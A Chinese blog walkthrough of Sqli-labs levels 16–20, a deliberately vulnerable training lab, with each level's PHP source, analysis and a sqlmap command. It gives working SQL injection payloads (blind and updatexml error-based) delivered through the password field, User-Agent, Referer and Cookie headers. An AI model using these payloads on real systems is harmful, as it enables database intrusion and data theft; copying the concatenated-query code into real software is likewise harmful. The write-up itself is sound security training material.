Basic Challenges(Less-16~20)[完结!]
前言
慢慢来,就很快,第一部分:基础挑战正式完结(完结撒花)!!
下一周,将进行高级部分的更新,敬请期待!
有问题欢迎留言或私信提问,有不足之处希望大家能够指出,大家共同进步!
本文格式
### Less-
**黑盒分析:**
**源代码相关部分:**
**代码分析:**
**脚本或工具的使用:**
**payload:**
Less-16
黑盒分析:
已知正确登录的账号密码是admin:admin,登录成功与否在页面上几乎没有区别,唯一的不同是页面有个img标签的src属性不同,这种情况下使用sqlmap我不知道怎么用,于是先手动测试注入点,
基本测试如下:
账号输入admin密码输入admin'#错误
账号输入admin密码输入admin"#错误
账号输入admin密码输入admin)#错误
账号输入admin密码输入admin')#错误
账号输入admin密码输入admin")#正确
可以判断注入点在admin")后面
然后通过脚本来进行盲注即可得到数据
源代码相关部分:
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname."\n");
fwrite($fp,'Password:'.$passwd."\n");
fclose($fp);
// connectivity
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
//echo '';
echo "
";
echo '';
//echo " You Have successfully logged in " ;
echo '';
echo "
";
//echo 'Your Login name:'. $row['username'];
echo "
";
//echo 'Your Password:' .$row['password'];
echo "
";
echo "";
echo "
";
echo "
";
echo '
';
echo "";
}
else
{
echo '';
echo "";
echo "";
//echo "Try again looser";
//print_r(mysql_error());
echo "";
echo "";
echo "";
echo '
';
echo "";
}
}
?>
代码分析:
sql语句通过拼接代入数据库查询,变量由")包裹,只需要闭合双引号和括号即可实现SQL注入
脚本或工具的使用:
脚本类似上篇文章的Less-15,只需要修改一下payload的符号即可
payload:
") or length(database())>1#
Less-17
黑盒分析:
本关卡
当用户名输入错误的时候显示如下
![Sqli-labs通关笔记(Less-16~20)[基础篇完结!]_第1张图片](http://img.e-com-net.com/image/info10/a23e76e141194e5db5df8f6a29b6b278.jpg)
![Sqli-labs通关笔记(Less-16~20)[基础篇完结!]_第2张图片](http://img.e-com-net.com/image/info10/e31a481c8a624709ae660b7b53982d86.jpg)
SELECT语句,而是
UPDATE语句,一番百度过后,了解到,对于这种注入点,可以使用报错注入来实现获取数据,所以先尝试看是否会报错。
(文末总结几种常见的集中SQL语句形式)
UPDATE语句一般长这样:
UPDATE users SET password='Nicky' WHERE id=2 and username='Olivia';
如果输入的密码有'或"SQL语句会出现语法错误,于是进行如下尝试:
输入用户名admin和密码admin正常
输入用户名admin和密码'admin'报错
此处存在报错注入!
所以构造报错语句updatexml()代入进行尝试
输入用户名admin和密码admin' updatexml(1,concat(0x7e,(version()),0x7e),1) or '
效果如下:
![Sqli-labs通关笔记(Less-16~20)[基础篇完结!]_第3张图片](http://img.e-com-net.com/image/info10/90c352573c614504804ddb732a06946e.jpg)
所以此处存在报错注入,可以通过报错注入得到数据
源代码相关部分:
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
//making sure uname is not injectable
$uname=check_input($_POST['uname']);
$passwd=$_POST['passwd'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname."\n");
fwrite($fp,'New Password:'.$passwd."\n");
fclose($fp);
// connectivity
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
//echo $row;
if($row)
{
//echo '';
$row1 = $row['username'];
//echo 'Your Login name:'. $row1;
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
mysql_query($update);
echo "
";
if (mysql_error())
{
echo '';
print_r(mysql_error());
echo "";
echo "";
}
else
{
echo '';
//echo " You password has been successfully updated " ;
echo "
";
echo "";
}
echo '
';
//echo 'Your Password:' .$row['password'];
echo "";
}
else
{
echo '';
//echo "Bug off you Silly Dumb hacker";
echo "";
echo '
';
echo "";
}
}
代码分析:
本关构造了两次SQL语句,第一次构造查询语句
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
这个查询语句使用了错误抑制符,不会报错,查询成功与否显示完全相同
查询用户名是否存在,如果存在,则会执行第二个SQL语句:
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
这个UPDATE语句中,password是我们可控的内容
再加上后面
if (mysql_error()){
echo '';
print_r(mysql_error());
echo "";
echo "";
}
如果报错,则回显示错误,此处可以通过构造报错语句实现报错注入
脚本或工具的使用:
sqlmap -u "http://localhost/Less-17/" --forms
--forms:测试表单
sqlmap会提示输入表单默认内容,表单内容输入为
uname=admin&passwd=admin&submit=Submit
即可
![Sqli-labs通关笔记(Less-16~20)[基础篇完结!]_第4张图片](http://img.e-com-net.com/image/info10/f3b4620229b8478d84af8120c9d4e805.jpg)
payload:
admin' updatexml(1,concat(0x7e,(version()),0x7e),1) or '
Less-18
黑盒分析:
登录成功页面:
![Sqli-labs通关笔记(Less-16~20)[基础篇完结!]_第5张图片](http://img.e-com-net.com/image/info10/465f4ae6b1b048e0bddf20518cce8c12.jpg)
登录失败页面:
[基础篇完结!]_第6张图片](http://img.e-com-net.com/image/info10/275f842f9b1046d59dcd7689d15f4aa5.jpg)
此处报错了!!
接下来构造报错语句
or updatexml(1,concat(0x7e,(version()),0x7e),1) or进行测试,修改
User Agent如下:
Mozilla/5.0'or updatexml(1,concat(0x7e,(version()),0x7e),1) or '
效果如下:
![Sqli-labs通关笔记(Less-16~20)[基础篇完结!]_第7张图片](http://img.e-com-net.com/image/info10/8fb4c1cc095b494fbd4c0a16d74ce916.jpg)
成功报错注入!
源代码相关部分:
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$fp=fopen('result.txt','a');
fwrite($fp,'User Agent:'.$uname."\n");
fclose($fp);
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1)
{
echo '';
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
mysql_query($insert);
//echo 'Your IP ADDRESS is: ' .$IP;
echo "";
//echo "
";
echo '';
echo 'Your User Agent is: ' .$uagent;
echo "";
echo "
";
print_r(mysql_error());
echo "
";
echo '';
echo "
";
}
else
{
echo '';
//echo "Try again looser";
print_r(mysql_error());
echo "";
echo "";
echo '';
echo "";
}
}
代码分析:
通过POST获取账号密码,进行SELECT查询,如果查询到结果了,就将User Agent插入到数据库里
第一个查询语句可能存在时间盲注
第二个插入语句存在报错注入
payload:
Mozilla/5.0'or updatexml(1,concat(0x7e,(version()),0x7e),1) or '
Less-19
黑盒分析:
登陆成功页面:
![Sqli-labs通关笔记(Less-16~20)[基础篇完结!]_第8张图片](http://img.e-com-net.com/image/info10/89c35d4b99dd40bf888cd37e51f25304.jpg)
登录失败页面:
![Sqli-labs通关笔记(Less-16~20)[基础篇完结!]_第9张图片](http://img.e-com-net.com/image/info10/9611f24fe3cd40fc88ce5ae69a242941.jpg)
此关与上一关卡很像啊有木有!!!
按照上一关的思路试一哈~
http头的Referer会被存到数据库里,所以构造Referer:如下
Referer: abc' or updatexml(1,concat(0x7e,(version()),0x7e),1) or '
得到结果如下:
![Sqli-labs通关笔记(Less-16~20)[基础篇完结!]_第10张图片](http://img.e-com-net.com/image/info10/b45fbad43c654cf799a0ba5b33b111e3.jpg)
此处存在报错注入!
源代码相关部分:
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$fp=fopen('result.txt','a');
fwrite($fp,'Referer:'.$uname."\n");
fclose($fp);
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1)
{
echo '';
$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
mysql_query($insert);
//echo 'Your IP ADDRESS is: ' .$IP;
echo "";
//echo "
";
echo '';
echo 'Your Referer is: ' .$uagent;
echo "";
echo "
";
print_r(mysql_error());
echo "
";
echo '';
echo "
";
}
else
{
echo '';
//echo "Try again looser";
print_r(mysql_error());
echo "";
echo "";
echo '';
echo "";
}
}
代码分析:
本关卡与上一关一样,先通过SELECT语句登录
如果登陆成功,则插入Referer到数据库里,
插入报错则回显,所以
可以在INSERT语句中构造语句进行报错注入
payload:
Referer: abc' or updatexml(1,concat(0x7e,(version()),0x7e),1) or '
Less-20
黑盒分析:
登录成功页面:
![Sqli-labs通关笔记(Less-16~20)[基础篇完结!]_第11张图片](http://img.e-com-net.com/image/info10/e9f708ef389c4b438647d2388de555d1.jpg)
点击Delete Your Cookie!按钮,会返回登录页面
登录失败页面:
![Sqli-labs通关笔记(Less-16~20)[基础篇完结!]_第12张图片](http://img.e-com-net.com/image/info10/998fbafedb1445078de9acdaa961a48f.jpg)
登录成功,返回了我的IP,User Agent,COOKIE,Username,Password信息
登录会请求一个cookie,cookie有有效期
通过Burp截断发现,登录成功先会返回一个界面:
![Sqli-labs通关笔记(Less-16~20)[基础篇完结!]_第13张图片](http://img.e-com-net.com/image/info10/994296e9acd9435282acddd06deb6f04.jpg)
然后跳转到前面登录成功的页面,
页面上有一句
I LOVE YOU COOKIES,这应该是个提示,注入点可能在cookie处,所以先进行cookie注入测试:
初步判断这可能是在登录成功后获取到了cookie,跳转到登陆成功页面后,会从数据库查询cookie的值
![Sqli-labs通关笔记(Less-16~20)[基础篇完结!]_第14张图片](http://img.e-com-net.com/image/info10/35ca6de6021344d7a05c037862306b77.jpg)
报错了,此处存在报错注入,尝试如下构造代码:
Cookie: uname=admin' or updatexml(1,concat(0x7e,version(),0x7e),1)#;
效果如下:
![Sqli-labs通关笔记(Less-16~20)[基础篇完结!]_第15张图片](http://img.e-com-net.com/image/info10/73782941ed8c41ba8bbedbcd1cc3dfde.jpg)
此处存在报错注入!
源代码相关部分:
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
$cookee = $row1['username'];
if($row1)
{
echo '';
setcookie('uname', $cookee, time()+3600);
header ('Location: index.php');
echo "I LOVE YOU COOKIES";
echo "";
echo '';
//echo 'Your Cookie is: ' .$cookee;
echo "";
echo "
";
print_r(mysql_error());
echo "
";
echo '';
echo "
";
}
else
{
echo '';
//echo "Try again looser";
print_r(mysql_error());
echo "";
echo "";
echo '';
echo "";
}
}
echo "";
echo '';
echo '
';
echo "